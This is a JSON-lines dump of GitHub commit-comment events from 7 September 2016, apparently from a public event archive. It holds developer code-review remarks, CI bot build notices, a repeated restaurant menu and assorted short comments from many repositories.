{"id":"4527125297","type":"CommitCommentEvent","actor":{"login":"mwalle"},"repo":{"name":"jbaltes/python-ixia"},"payload":{"comment":{"id":18927061,"position":19,"line":42,"path":"examples/ixia-control.py","commit_id":"bb5314eb5746060f5402b447684adb26608e685e","created_at":"2016-09-07T11:50:21Z","updated_at":"2016-09-07T11:50:21Z","body":"ALLOWED_COMMANDS=\"take_ownership clear_ownership..\".split()\r\nALLOWED_STATS=\"..\".split()"}},"created_at":"2016-09-07T11:50:21Z"}
{"id":"4527132330","type":"CommitCommentEvent","actor":{"login":"swenggmanjeet"},"repo":{"name":"swenggmanjeet/BookKart"},"payload":{"comment":{"id":18927078,"position":null,"line":null,"path":null,"commit_id":"3c87fe05176a11516a3f8c77ba8f3465ac31511a","created_at":"2016-09-07T11:51:57Z","updated_at":"2016-09-07T11:51:57Z","body":"DELETED "}},"created_at":"2016-09-07T11:51:57Z"}
{"id":"4527133883","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18927080,"position":35,"line":39,"path":"js/product.js","commit_id":"4444edc7acceb67936bcf066dd7492f3c4910e12","created_at":"2016-09-07T11:52:18Z","updated_at":"2016-09-07T11:52:18Z","body":"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/hasOwnProperty"}},"created_at":"2016-09-07T11:52:18Z"}
{"id":"4527135368","type":"CommitCommentEvent","actor":{"login":"mattische"},"repo":{"name":"dite-bth/wu15"},"payload":{"comment":{"id":18927083,"position":null,"line":null,"path":null,"commit_id":"61831b57d60c5f96c1e2aa96e865fc74c7234ff6","created_at":"2016-09-07T11:52:36Z","updated_at":"2016-09-07T11:52:36Z","body":"Hur är tabellen tänkt att användas?"}},"created_at":"2016-09-07T11:52:36Z"}
{"id":"4527136225","type":"CommitCommentEvent","actor":{"login":"kzidane"},"repo":{"name":"cs50/harvard.cs50.debug"},"payload":{"comment":{"id":18927087,"position":null,"line":null,"path":null,"commit_id":"f5dfdb881cf21f7c80853a67fcf0f2747cbd1223","created_at":"2016-09-07T11:52:49Z","updated_at":"2016-09-07T11:52:49Z","body":"@danallan, thanks so much for the input!\r\n\r\nYou're right about the reason, and your suggestions make sense to me! Though haven't heard your thoughts about #7, as an additional method?\r\n\r\nRe the fundamental fix, not sure how hard it would be to have the UI monitor the PID, and how that would be different from having our plugin monitor it? But I do like the no-op shell way.\r\n\r\n@glennholloway thoughts? See also #7."}},"created_at":"2016-09-07T11:52:49Z"}
{"id":"4527136563","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18927088,"position":null,"line":null,"path":null,"commit_id":"37f60ab60812a874345aa83b4b3cca3d0e2bd8e5","created_at":"2016-09-07T11:52:54Z","updated_at":"2016-09-07T11:52:54Z","body":"it's two different variables"}},"created_at":"2016-09-07T11:52:54Z"}
{"id":"4527137338","type":"CommitCommentEvent","actor":{"login":"Safihre"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18927089,"position":null,"line":null,"path":null,"commit_id":"1157e498f01a787dff01e9ab3fb5610d60b60611","created_at":"2016-09-07T11:53:06Z","updated_at":"2016-09-07T11:53:06Z","body":"Renamed and extended the commit and force-pushed my branch. \r\n@sanderjo probably best to re-clone my branch and apply your changes again, otherwise it probably gives a conflict.\r\nThe new commit: ed189e8, also updates ```sslinfo.py``` to not use pyOpenSSL."}},"created_at":"2016-09-07T11:53:06Z"}
{"id":"4527139717","type":"CommitCommentEvent","actor":{"login":"lizarusi"},"repo":{"name":"lizarusi/react-native-scrollable-tab-view"},"payload":{"comment":{"id":18927095,"position":36,"line":143,"path":"index.js","commit_id":"22bcd0004168e2de62de5ac5c5713d4ac2c462e7","created_at":"2016-09-07T11:53:38Z","updated_at":"2016-09-07T11:53:38Z","body":"true story :)"}},"created_at":"2016-09-07T11:53:38Z"}
{"id":"4527139796","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18927094,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T11:53:38Z","updated_at":"2016-09-07T11:53:38Z","body":"1)\r\nThis does not fix the issue reported by @stefansaraev , does it?\r\n\r\n2)\r\nIt introduces an ifdef at a place we don't want it anymore. @Memphiz introduced a new overridable class https://github.com/xbmc/xbmc/blob/master/xbmc/platform/Platform.cpp for those type of things."}},"created_at":"2016-09-07T11:53:38Z"}
{"id":"4527140484","type":"CommitCommentEvent","actor":{"login":"Celoxocis"},"repo":{"name":"CyanogenMod/android_device_asus_msm8916-common"},"payload":{"comment":{"id":18927098,"position":null,"line":null,"path":null,"commit_id":"c92e721153264f1bd52e0c483691627e4249aac7","created_at":"2016-09-07T11:53:48Z","updated_at":"2016-09-07T11:53:48Z","body":"@saddamuwejan start here https://wiki.cyanogenmod.org/w/Doc:_porting_intro\r\nand use the seach function in http://forum.xda-developers.com/ to find answers.\r\nNo one will take the take off their \"free time\" (free time besides dev-work is for family+friends) and teach you how to do it.\r\nThats something you have to do on your own."}},"created_at":"2016-09-07T11:53:48Z"}
{"id":"4527147164","type":"CommitCommentEvent","actor":{"login":"wonpn"},"repo":{"name":"wonpn/bing-wallpaper-download-set"},"payload":{"comment":{"id":18927110,"position":null,"line":null,"path":null,"commit_id":"7d92c302d5d96b18f218248b0522f2a40c98a208","created_at":"2016-09-07T11:55:21Z","updated_at":"2016-09-07T11:55:21Z","body":"use this to build a exe for windows\r\npyinstaller bing-wallpaper-download-set.py --onefile --noconsole"}},"created_at":"2016-09-07T11:55:21Z"}
{"id":"4527150268","type":"CommitCommentEvent","actor":{"login":"jsteemann"},"repo":{"name":"arangodb/arangodb-php"},"payload":{"comment":{"id":18927116,"position":47,"line":47,"path":"CHANGELOG","commit_id":"8aca9a25e1b676f64f7790a16650f88b22c2ab50","created_at":"2016-09-07T11:56:03Z","updated_at":"2016-09-07T11:56:03Z","body":"@frankmayer : there are currently no triggers present in ArangoDB. \r\nI wanted to add them about 2 years ago, but it proved to be difficult in terms of which collections to lock when, especially in the clustering mode. So the implementation never made it. They may be added at some later point (that's unclear to me), but they are definitely not planned for the upcoming 3.1 release.\r\n\r\nIf you want to push the performance patch for the driver, please just do it. Thanks!"}},"created_at":"2016-09-07T11:56:03Z"}
{"id":"4527151580","type":"CommitCommentEvent","actor":{"login":"jh0ker"},"repo":{"name":"jh0ker/mau_mau_bot"},"payload":{"comment":{"id":18927119,"position":null,"line":null,"path":null,"commit_id":"b8e8a7e5de4837dfcf4ec5194e4204567c2efd75","created_at":"2016-09-07T11:56:20Z","updated_at":"2016-09-07T11:56:20Z","body":"You bluff automatically when you play a +4 even though you had cards of the current color on your hand. Seriously I don't know why people always ask this. Just google \"uno bluff\" and the first result explains it. Its just a regular game rule."}},"created_at":"2016-09-07T11:56:20Z"}
{"id":"4527154731","type":"CommitCommentEvent","actor":{"login":"vicb"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18927126,"position":5,"line":35,"path":"modules/@angular/compiler/test/schema/dom_element_schema_registry_spec.ts","commit_id":"d309f7799c12a0b6ac70b64552da2bd2ee9ff872","created_at":"2016-09-07T11:57:02Z","updated_at":"2016-09-07T11:57:02Z","body":"we enumerate `windows` props to get a list of all the DOM interfaces.\r\n\r\nchrome uses an `HTMLUnknownElement` for those els hence they can not be auto-detected and have to be added manually when the schema is created.\r\n\r\nThere is no difference on how those els are handled vs others. (I agree the name is unforturnate, feel free to send a PR if you have a better one)"}},"created_at":"2016-09-07T11:57:02Z"}
{"id":"4527160638","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18927140,"position":null,"line":null,"path":null,"commit_id":"feb39d673421d4e80369cff9c3112a25b09eb5df","created_at":"2016-09-07T11:58:20Z","updated_at":"2016-09-07T11:58:20Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T11:58:20Z"}
{"id":"4527166641","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18927148,"position":null,"line":null,"path":null,"commit_id":"b76fc6d65d727cd3e3e69ec2618e51865340c199","created_at":"2016-09-07T11:59:38Z","updated_at":"2016-09-07T11:59:38Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#HNzK8d0YSwSfshtMITHMow"}},"created_at":"2016-09-07T11:59:38Z"}
{"id":"4527173895","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18927160,"position":null,"line":null,"path":null,"commit_id":"37f60ab60812a874345aa83b4b3cca3d0e2bd8e5","created_at":"2016-09-07T12:01:12Z","updated_at":"2016-09-07T12:01:12Z","body":"Oups ....\r\n\r\nSorry :)"}},"created_at":"2016-09-07T12:01:12Z"}
{"id":"4527176502","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18927165,"position":null,"line":null,"path":null,"commit_id":"4e5ce632abc3fb503300b685ff24868852ad9781","created_at":"2016-09-07T12:01:45Z","updated_at":"2016-09-07T12:01:45Z","body":"And now the input invalid bug, that's done as well."}},"created_at":"2016-09-07T12:01:45Z"}
{"id":"4527176922","type":"CommitCommentEvent","actor":{"login":"stfx"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18927166,"position":20,"line":18,"path":"Refunct/Refunct.asl","commit_id":"28d2c5d8691fa6c897f9e7aafc824a4050964646","created_at":"2016-09-07T12:01:51Z","updated_at":"2016-09-07T12:01:51Z","body":"I feel like using `return current.height < -2400 && current.height < old.height && current.button_count == 0;` would be better - only edge case would be when player dives down again without any button pressed."}},"created_at":"2016-09-07T12:01:51Z"}
{"id":"4527177750","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18927168,"position":null,"line":null,"path":null,"commit_id":"37f60ab60812a874345aa83b4b3cca3d0e2bd8e5","created_at":"2016-09-07T12:02:02Z","updated_at":"2016-09-07T12:02:02Z","body":"Maybe, better is to don't search it if clienttoken is empty ? Here we do a non needed request on DB. No ?\r\n"}},"created_at":"2016-09-07T12:02:02Z"}
{"id":"4527178948","type":"CommitCommentEvent","actor":{"login":"lacrioque"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18927169,"position":null,"line":null,"path":null,"commit_id":"37f60ab60812a874345aa83b4b3cca3d0e2bd8e5","created_at":"2016-09-07T12:02:17Z","updated_at":"2016-09-07T12:02:17Z","body":"$oTokenEntry -> DatabaseEntry\r\n$clienttoken -> POST/SESSION value"}},"created_at":"2016-09-07T12:02:17Z"}
{"id":"4527179951","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18927174,"position":null,"line":null,"path":null,"commit_id":"f5a700fcb26cf2e4f4298971eefae693276906fa","created_at":"2016-09-07T12:02:29Z","updated_at":"2016-09-07T12:02:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 51](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12866&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-07T12:02:29Z"}
{"id":"4527180793","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/server-tools"},"payload":{"comment":{"id":18927176,"position":41,"line":107,"path":"base_custom_info/views/custom_info_value_view.xml","commit_id":"150b55f72e87ec2da7919aa0971bc12ec633fcae","created_at":"2016-09-07T12:02:41Z","updated_at":"2016-09-07T12:02:41Z","body":"Don't use replace, but hide the field instead."}},"created_at":"2016-09-07T12:02:41Z"}
{"id":"4527184104","type":"CommitCommentEvent","actor":{"login":"lacrioque"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18927183,"position":null,"line":null,"path":null,"commit_id":"37f60ab60812a874345aa83b4b3cca3d0e2bd8e5","created_at":"2016-09-07T12:03:25Z","updated_at":"2016-09-07T12:03:25Z","body":"Both have to be tested see #11633 in Bugtracker"}},"created_at":"2016-09-07T12:03:25Z"}
{"id":"4527186427","type":"CommitCommentEvent","actor":{"login":"array88"},"repo":{"name":"Mogara/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":18927185,"position":null,"line":null,"path":null,"commit_id":"6909763f7fe370e7637f9a523d6bff7545050f7c","created_at":"2016-09-07T12:03:55Z","updated_at":"2016-09-07T12:03:55Z","body":"（不好意思还是和此次commit完全无关……）\r\nroom.cpp，6367行doGongxin里面，ai->askForAG的第三个参数应该是skill_name而不是objectName()。现在的结果是攻心选牌AI完全不起作用，因为技能名传不进去"}},"created_at":"2016-09-07T12:03:55Z"}
{"id":"4527187397","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18927189,"position":null,"line":null,"path":null,"commit_id":"f5a700fcb26cf2e4f4298971eefae693276906fa","created_at":"2016-09-07T12:04:09Z","updated_at":"2016-09-07T12:04:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 51](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12866&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:40"}},"created_at":"2016-09-07T12:04:09Z"}
{"id":"4527188392","type":"CommitCommentEvent","actor":{"login":"ryanbr"},"repo":{"name":"Blackbird88/Prebake"},"payload":{"comment":{"id":18927191,"position":null,"line":null,"path":null,"commit_id":"b6001745ab35c8cdb35e136b1a1599a40dc16ec7","created_at":"2016-09-07T12:04:22Z","updated_at":"2016-09-07T12:04:22Z","body":"Thanks! Added here also.\r\n\r\nhttps://github.com/ryanbr/fanboy-adblock/commit/fe9bd938aefc80790054cd13aaa88df4918c0cd2"}},"created_at":"2016-09-07T12:04:22Z"}
{"id":"4527190503","type":"CommitCommentEvent","actor":{"login":"jimconner"},"repo":{"name":"alphagov/paas-cf"},"payload":{"comment":{"id":18927194,"position":10,"line":69,"path":"concourse/pipelines/create-deployer.yml","commit_id":"d1428aab4a0f3a12381a4b1b4cb04ac1427448e6","created_at":"2016-09-07T12:04:50Z","updated_at":"2016-09-07T12:04:50Z","body":"I fetched from the latest master and merged with our older changes for subnet-id, dns-domain-name and shared-s3-bosh-package-cache (because those values are hardcoded in paas-cf, and we can't deploy using the goverment's domains)... Totally possible that I did something wrong along the way, but couldn't spot the problem when comparing the diffs.... Just noticed the v240 stuff (you did that when I was at lunch) and have merged in those changes from upstream once again... Deploying now.. fingers crossed."}},"created_at":"2016-09-07T12:04:50Z"}
{"id":"4527191459","type":"CommitCommentEvent","actor":{"login":"redhatprabu"},"repo":{"name":"redhatprabu/FirstProject"},"payload":{"comment":{"id":18927199,"position":null,"line":null,"path":null,"commit_id":"3b0ebb8f07f8f8efc8e37fcd109be08b38b909a5","created_at":"2016-09-07T12:05:02Z","updated_at":"2016-09-07T12:05:02Z","body":"test2"}},"created_at":"2016-09-07T12:05:02Z"}
{"id":"4527193668","type":"CommitCommentEvent","actor":{"login":"albamesp"},"repo":{"name":"albamesp/RATES"},"payload":{"comment":{"id":18927204,"position":null,"line":null,"path":null,"commit_id":"9c5f7c38af7f3803257499ff3ca2e71290049b9a","created_at":"2016-09-07T12:05:29Z","updated_at":"2016-09-07T12:05:29Z","body":"Initializing RATES website "}},"created_at":"2016-09-07T12:05:29Z"}
{"id":"4527194638","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18927210,"position":null,"line":null,"path":null,"commit_id":"fb8bac324e2ef1b73e27d9dca47681b2b458fef3","created_at":"2016-09-07T12:05:41Z","updated_at":"2016-09-07T12:05:41Z","body":"I see the bug now, it won't show you how much damage the enemy does (or do it for that matter) unless you fail, causing the enemy to deal hundreds of damage."}},"created_at":"2016-09-07T12:05:41Z"}
{"id":"4527200586","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/wysiwyd"},"payload":{"comment":{"id":18927220,"position":null,"line":null,"path":null,"commit_id":"2291d7c961bcd181915b4c97ed229f8fc3c6a259","created_at":"2016-09-07T12:07:00Z","updated_at":"2016-09-07T12:07:00Z","body":"Big 👍 "}},"created_at":"2016-09-07T12:07:00Z"}
{"id":"4527204087","type":"CommitCommentEvent","actor":{"login":"steelbrain"},"repo":{"name":"zippyui/react-datagrid"},"payload":{"comment":{"id":18927224,"position":4,"line":6,"path":"lib/ColumnFilter.js","commit_id":"4a9190a81b8ff332eb931a845930322d881b09da","created_at":"2016-09-07T12:07:47Z","updated_at":"2016-09-07T12:07:47Z","body":"Syntax Error here, a missing `)`"}},"created_at":"2016-09-07T12:07:47Z"}
{"id":"4527207022","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18927228,"position":null,"line":null,"path":null,"commit_id":"fb8bac324e2ef1b73e27d9dca47681b2b458fef3","created_at":"2016-09-07T12:08:26Z","updated_at":"2016-09-07T12:08:26Z","body":"I have to successively press 'Q', 'D', then 'B' and HOPE it works."}},"created_at":"2016-09-07T12:08:26Z"}
{"id":"4527209814","type":"CommitCommentEvent","actor":{"login":"chrisroos"},"repo":{"name":"freerange/mocha"},"payload":{"comment":{"id":18927238,"position":null,"line":null,"path":null,"commit_id":"5f768de62a6b6fb2c1c275b5830bc6471722cce4","created_at":"2016-09-07T12:09:07Z","updated_at":"2016-09-07T12:09:07Z","body":"Bleurgh. I forgot to update the commit subject before pushing. Sorry!"}},"created_at":"2016-09-07T12:09:07Z"}
{"id":"4527210342","type":"CommitCommentEvent","actor":{"login":"vavrecan"},"repo":{"name":"touchdesign/prestashop-sofortbanking"},"payload":{"comment":{"id":18927240,"position":8,"line":80,"path":"validation.php","commit_id":"47888f4fc7d21a01cdca041ccee00333dcea2d9c","created_at":"2016-09-07T12:09:14Z","updated_at":"2016-09-07T12:09:14Z","body":"I have quick question, shouldn't be the payment amount also validated manually if order already exists? "}},"created_at":"2016-09-07T12:09:14Z"}
{"id":"4527215104","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18927245,"position":null,"line":null,"path":null,"commit_id":"37f60ab60812a874345aa83b4b3cca3d0e2bd8e5","created_at":"2016-09-07T12:10:16Z","updated_at":"2016-09-07T12:10:16Z","body":"@lacrioque : i know the original issue BUT:\r\n```\r\n        //Check for the token-validity\r\n        if($clienttoken != \"\")\r\n        {\r\n          if ($thissurvey['alloweditaftercompletion'] == 'Y' ) {\r\n              $oTokenEntry = Token::model($surveyid)->findByAttributes(array('token'=>$clienttoken));\r\n          } else {\r\n              $oTokenEntry = Token::model($surveyid)->usable()->incomplete()->findByAttributes(array('token' => $clienttoken));\r\n          }\r\n        }\r\n        $subscenarios['tokenValid'] = !empty($oTokenEntry);\r\n```\r\nSeem better : don't search for token if it's empty\r\n\r\n"}},"created_at":"2016-09-07T12:10:16Z"}
{"id":"4527215954","type":"CommitCommentEvent","actor":{"login":"DanielAndreasen"},"repo":{"name":"jason-neal/Spectrum"},"payload":{"comment":{"id":18927246,"position":11,"line":25,"path":"Spectrum.py","commit_id":"404df06628ae9606bf6b597184528fe403cb15bc","created_at":"2016-09-07T12:10:26Z","updated_at":"2016-09-07T12:10:26Z","body":"Why not just `selx.xaxis = np.asarray(selx.xaxis)` and then don't worry about these checks. This can be done already in `__init__`.\r\n\r\nSpeaking of procrastinating..."}},"created_at":"2016-09-07T12:10:26Z"}
{"id":"4527217312","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18927247,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T12:10:43Z","updated_at":"2016-09-07T12:10:43Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T12:10:43Z"}
{"id":"4527217672","type":"CommitCommentEvent","actor":{"login":"niuyuling"},"repo":{"name":"xiaoqidun/lnmpp"},"payload":{"comment":{"id":18927248,"position":null,"line":null,"path":null,"commit_id":"86bd3345f3350a0f55ed476587008260337f12dc","created_at":"2016-09-07T12:10:47Z","updated_at":"2016-09-07T12:10:47Z","body":"非常棒,"}},"created_at":"2016-09-07T12:10:47Z"}
{"id":"4527218043","type":"CommitCommentEvent","actor":{"login":"cernam"},"repo":{"name":"cernam/Hello-World"},"payload":{"comment":{"id":18927251,"position":null,"line":null,"path":null,"commit_id":"fa8b3a9396aca3264bf492a59d2e8e110299d6c8","created_at":"2016-09-07T12:10:53Z","updated_at":"2016-09-07T12:10:53Z","body":"This is my second comment on hello world."}},"created_at":"2016-09-07T12:10:53Z"}
{"id":"4527219543","type":"CommitCommentEvent","actor":{"login":"CineXMike"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18927256,"position":null,"line":null,"path":null,"commit_id":"ed404d94f7c6f2f9d198527119f1a0498360c6a6","created_at":"2016-09-07T12:11:15Z","updated_at":"2016-09-07T12:11:15Z","body":"This error.\r\nhttp://i64.tinypic.com/52c3uh.png"}},"created_at":"2016-09-07T12:11:15Z"}
{"id":"4527220328","type":"CommitCommentEvent","actor":{"login":"cernam"},"repo":{"name":"cernam/Hello-World"},"payload":{"comment":{"id":18927260,"position":null,"line":null,"path":null,"commit_id":"fa8b3a9396aca3264bf492a59d2e8e110299d6c8","created_at":"2016-09-07T12:11:25Z","updated_at":"2016-09-07T12:11:25Z","body":"Just following directions to comment on my comment commit."}},"created_at":"2016-09-07T12:11:25Z"}
{"id":"4527226592","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927277,"position":8,"line":145,"path":"README.adoc","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T12:12:51Z","updated_at":"2016-09-07T12:12:51Z","body":"> My point is that it's still a magical incantation unless the reader understands the following:\r\n> \r\n> - jar is an object representing a specific instance of a Jar task\r\n> - dot-notations allows you to set properties and call methods on that object\r\n> - the braces syntax is a way to configure settings on a task and applies to all task objects\r\n>\r\n> I agree that this is an excellent learning opportunity, I just don't think we have the material yet to introduce readers to the above points without causing confusion.\r\n\r\nGood points. See 10936d988276b887a0b19f9f90616a7ed79fe0b4, where I've tried to address these concerns with a simple inline link to general task configuration documentation, so as not to bloat the admonition itself.\r\n\r\n> In fact, perhaps the example should use the jar.manifest {} syntax to eliminate one of the magic aspects of Gradle configuration.\r\n\r\nOn one hand, this makes sense, because I agree the dotted notation it is that much easier for the uninitiated to understand intuitively, but on the other hand, this syntax is not particularly idiomatic for Gradle in my experience. I think we should be wary in these guides of going against established idioms unless we (a) have a really good reason to do so, and (b) call out the fact that we're going against the norm and explain why. I'm not sure it's compelling enough in this case to do so."}},"created_at":"2016-09-07T12:12:51Z"}
{"id":"4527226737","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18927278,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T12:12:53Z","updated_at":"2016-09-07T12:12:53Z","body":"see https://github.com/xbmc/xbmc/pull/10419 \r\nIfdefs are in there already, one more doesn't change anything. Alternatively I can define the GetPath method for darwin"}},"created_at":"2016-09-07T12:12:53Z"}
{"id":"4527230718","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"HenriqueMaiani/EDL"},"payload":{"comment":{"id":18927287,"position":null,"line":null,"path":null,"commit_id":"a25af252e144232ee4b2a8dfaf317806a93f09a8","created_at":"2016-09-07T12:13:46Z","updated_at":"2016-09-07T12:13:46Z","body":"Ok.\r\nOs exemplos ainda não são \"representativos\", isto é não exploram nenhuma característica interessante de C#."}},"created_at":"2016-09-07T12:13:46Z"}
{"id":"4527236284","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18927297,"position":null,"line":null,"path":null,"commit_id":"8db3c0591ee2f8c81936b63c90e220463d56b9ff","created_at":"2016-09-07T12:14:59Z","updated_at":"2016-09-07T12:14:59Z","body":"See 0ad47f625feb89fff142792f7a706a765b3d0c65, where I now mention in the prerequisites that you'll need a text editor **or IDE**."}},"created_at":"2016-09-07T12:14:59Z"}
{"id":"4527237946","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18927301,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T12:15:23Z","updated_at":"2016-09-07T12:15:23Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T12:15:23Z"}
{"id":"4527238382","type":"CommitCommentEvent","actor":{"login":"T-bear"},"repo":{"name":"dite-bth/wu15"},"payload":{"comment":{"id":18927302,"position":null,"line":null,"path":null,"commit_id":"61831b57d60c5f96c1e2aa96e865fc74c7234ff6","created_at":"2016-09-07T12:15:27Z","updated_at":"2016-09-07T12:15:27Z","body":"Att kunna lagra och hämta information, jag antar att vi har tänkt fel. Men\nden ligger på den regnbågsfärgade pajen i mysql med användare root och\nlösenord apa.\n\nonsdag 7 september 2016 skrev Mattias Schertell <notifications@github.com>:\n\n> Hur är tabellen tänkt att användas?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dite-bth/wu15/commit/61831b57d60c5f96c1e2aa96e865fc74c7234ff6#commitcomment-18927083>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARz30yx5gKCi1TaNnbSN730tqhziz0N4ks5qnqWFgaJpZM4J21aW>\n> .\n>\n"}},"created_at":"2016-09-07T12:15:27Z"}
{"id":"4527247063","type":"CommitCommentEvent","actor":{"login":"adriweb"},"repo":{"name":"shaiton/git-review"},"payload":{"comment":{"id":18927320,"position":null,"line":null,"path":null,"commit_id":"6a2662e9f2fde9f15444ba72ed0d2e1951973afc","created_at":"2016-09-07T12:17:22Z","updated_at":"2016-09-07T12:17:22Z","body":":+1: "}},"created_at":"2016-09-07T12:17:22Z"}
{"id":"4527251803","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18927329,"position":null,"line":null,"path":null,"commit_id":"a627935c43ce7b48ca6489ab692a6c9d3832dae3","created_at":"2016-09-07T12:18:25Z","updated_at":"2016-09-07T12:18:25Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Vu6qbuVlTYak75eNmwOb1A"}},"created_at":"2016-09-07T12:18:25Z"}
{"id":"4527257287","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18927344,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T12:19:36Z","updated_at":"2016-09-07T12:19:36Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T12:19:36Z"}
{"id":"4527259061","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"AeonLucid/POGOProtos"},"payload":{"comment":{"id":18927346,"position":null,"line":null,"path":null,"commit_id":"0170d19e1a02e65d1f600904a915b5988af39bd4","created_at":"2016-09-07T12:20:00Z","updated_at":"2016-09-07T12:20:00Z","body":"They're based on this, uk6 is not valid, if you use a different value."}},"created_at":"2016-09-07T12:20:00Z"}
{"id":"4527260730","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18927350,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T12:20:22Z","updated_at":"2016-09-07T12:20:22Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T12:20:22Z"}
